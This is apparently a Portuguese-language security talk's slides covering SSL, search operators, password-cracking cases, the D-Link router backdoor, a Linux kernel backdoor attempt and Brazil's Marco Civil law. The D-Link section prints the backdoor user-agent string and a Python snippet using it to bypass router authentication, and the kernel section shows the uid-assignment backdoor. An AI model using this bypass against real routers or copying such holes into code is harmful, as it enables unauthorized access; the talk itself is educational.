Introdução

Sobre Mim

  • Graduando em Ciência da Computação pelo IFCE Campus Maracanaú.
  • 7 anos de experiência com Linux.
  • Organizador do COMSOLiD a 6 anos.

Coordenação COMSOLiD

Introdução

Charge Cazo

Nicolás Maduro e Dilma Rousseff

SSL

Secure Socket Layer

Acesso seguro através da internet

Para acessar a internet com segurança usamos o protocolo SSL junto com o HTTP.

SSL do Gmail

Acesso seguro através da internet

SSL é uma nova camada de protocolo que opera em cima do protocolo TCP.

Permite ambas as máquina, cliente e servidor, estabelecer uma conexão criptografada.

Acesso seguro através da internet

Entretanto isso é uma especificação, ou seja, alguém tem que implementar. Alguns órgãos que a implementam:

Acesso seguro através da internet

Exemplo de mesma implementação para problemas diferentes:

multiplicação de 2 números:

2 * 3

ou

2 + 2 + 2

Software Livre é seguro?

Software Livre é seguro?

Códigos Compilados

Software Livre é seguro?

Códigos Interpretados

O quão é seguro uma criptografia usando SSL?

Hackers e Crackers

Hackers e Crackers

Crackers são pessoas que invadem computadores com propósitos criminais ou ganho pessoal.

Enquanto Hackers podem ser especialistas em segurança contratados por empresas, com o objetivo de encontrar possíveis vulnerabilidades e saná-las.

Hackeando Google

Hackear é uma coisa boa! Alguns sites permitem que isso seja feito de forma a otimizar processos, como fazer uma busca. Vejamos um exemplo com o Google quando fazemos a seguinte busca:

comsolid filetype:pdf

Além de buscar a palavra comsolid, ele busca apenas arquivos pdf.

Hackeando Google

Ou ainda podemos fazer buscas em determinados sites somente. Basta fazer uma busca na forma:

inkscape site:comsolid.org

Essa busca pesquisa a palavra inkscape no site comsolid.org

Hackeando Duck Duck Go

Hackeando Duck Duck Go

Duck Duck Go permite hacks mais engenhosos. Vamos a eles:

  • !g comsolid - busca comsolid no google
  • expand http://va.mu/dIwg - mostra a URL original
  • ip address - mostra seu endereço IP
  • github sige - mostra repositórios do github
  • @comsolid - mostra usuário do Twitter
  • age of linus torvalds - diz a idade
  • define free software - define uma palavra ou frase
  • weather in fortaleza - mostra a previsão do tempo
  • daft punk soundcloud - busca músicas no soundcloud

Hackeando Duck Duck Go

Técnicas para quebrar senhas

Técnicas para quebrar senhas

A técnica mais conhecida e natural é a força bruta, ou seja, tentar todas as combinações possíveis até encontrar. Isso funciona até certo ponto, quando a entrada é pequena.

Num artigo escrito por Dan Goodin no site http://arstechnica.com em que descreve como Kevin Young, um pesquisador de segurança de senhas, procedeu para descriptografar senhas vazadas pelo Antisec de uma empresa chamada Stratfor.

Técnicas para quebrar senhas

Técnicas para quebrar senhas

Uma das senhas era "crotalus atrox", nome científico de uma cobra. Tal senha foi quebrada graças a esta página da Wikipedia: https://en.wikipedia.org/wiki/Crotalus_atrox

Em seguida outras senhas fortes por serem grandes foram encontradas como:

  • "from genesis to revelations" (26)
  • "I cant remember anything" (24)
  • "thereisnofatebutwhatwemake" (26)
  • "givemelibertyorgivemedeath" (26)

Vazamento de senhas do Linkedin

Vazamento de senhas do Linkedin

Em Junho de 2012 um usuário anônimo postou no site http://insidepro.com/ uma lista com 6.5 milhões de hashs únicos referentes a senhas pedindo ajuda para recuperá-las.

Após quebrar muitas das senhas descobriu-se que se tratava de um banco de senhas do site Linkedin. Essa descoberta foi possível pelo número de senhas com a palavra linkedin.

Vazamento de senhas do Linkedin

Backdoor em Roteador D-Link

Engenharia reversa em firmware D-Link

Todos sabemos que a D-Link é especializada em fazer roteadores, e eles são um bom local para backdoors. E isso foi exatamente que Craig Heffner autor no blog http://www.devttys0.com encontrou.

Ele encontrou a partir de uma engenharia reversa no firmware de uma dos roteadores.

Engenharia reversa em firmware D-Link

Após notar que certa função chamada alpha_auth_check soava suspeita, ele foi saber o que exatamente ela fazia. Após um tempo ele chegou no seguinte trecho de código:

int alpha_auth_check(struct http_request_t *request) {
   if(strstr(request->url, "graphic/") ||
      strstr(request->url, "public/") ||
      strcmp(request->user_agent,
          "xmlset_roodkcableoj28840ybtide") == 0) {
      return AUTH_OK;
   } else {
      if(check_login(request->0xC, request->0xE0) != 0) {
         return AUTH_OK;
      }
   }
   return AUTH_FAIL;
}

Engenharia reversa em firmware D-Link

Baseado no código fonte das páginas HTML e outros detalhes é sensato concluir que os seguintes modelos são afetados:

  • DIR-100
  • DIR-120
  • DI-624S
  • DI-524UP
  • DI-604S
  • DI-604UP
  • DI-604+
  • TM-G5240

Engenharia reversa em firmware D-Link

Quem quiser fazer um teste real existe um código em Python escrito pelo próprio Craig e pode ser encontrado em:

http://pastebin.com/vbiG42VD

# Normally only admins can access the tools_misc.xgi page;
# use the backdoor user-agent to bypass authentication
import urllib2
# ...
req = urllib2.Request(url+buf,
    headers={
        'User-Agent': 'xmlset_roodkcableoj28840ybtide'
    })
urllib2.urlopen(req)

Ataque ao Kernel GNU/Linux

Ataque ao Kernel GNU/Linux

Ataque ao Kernel GNU/Linux

Comparemos os códigos original e o backdoor, e vejam se encontram a diferença.

/* ... */
if ((options == (__WCLONE|__WALL))
    && (current->uid = 0))
        retval = -EINVAL;
/* ... */
/* ... */
if ((options == (__WCLONE|__WALL))
    && (current->uid == 0))
        retval = -EINVAL;
/* ... */

Marco Civil da Internet no Brasil

Marco Civil da Internet no Brasil

O que é Marco Civil?

É um projeto de Lei que visa estabelecer direitos e deveres na utilização da Internet no Brasil. É a constituição da Internet no país.

Marco Civil da Internet no Brasil

  • Neutralidade: proíbe que provedores de internet discriminem certos serviços em detrimento de outros.
  • Armazenamento de dados: Operação de coleta de dados no Brasil deve respeitar a privacidade, proteção dos dados e sigilo das comunicações privadas.
  • Retirada de conteúdo: entidades que oferecem conteúdo e aplicações só serão responsabilizadas por danos gerados por terceiros se não acatarem ordem judicial exigindo a retirada dessas publicações.

Marco Civil da Internet no Brasil

  • Fim do marketing dirigido: as empresas de acesso não poderão "espiar" o conteúdo das informações trocadas pelos usuários na rede. Há interesse em fazer isso com fins comerciais, como para publicidade.
  • Sigilo e privacidade: Provedores de acesso à internet serão obrigados a guardar os registros das horas de acesso e do fim da conexão dos usuários pelo prazo de seis meses, mas isso deve ser feito em ambiente controlado.

Para mais detalhes: http://www.molon1313.com.br/marco-civil-da-internet/

Onde encontrar essa palestra?

Dúvidas?

<Obrigado pela atenção!>

Qualquer dúvida entre em contato.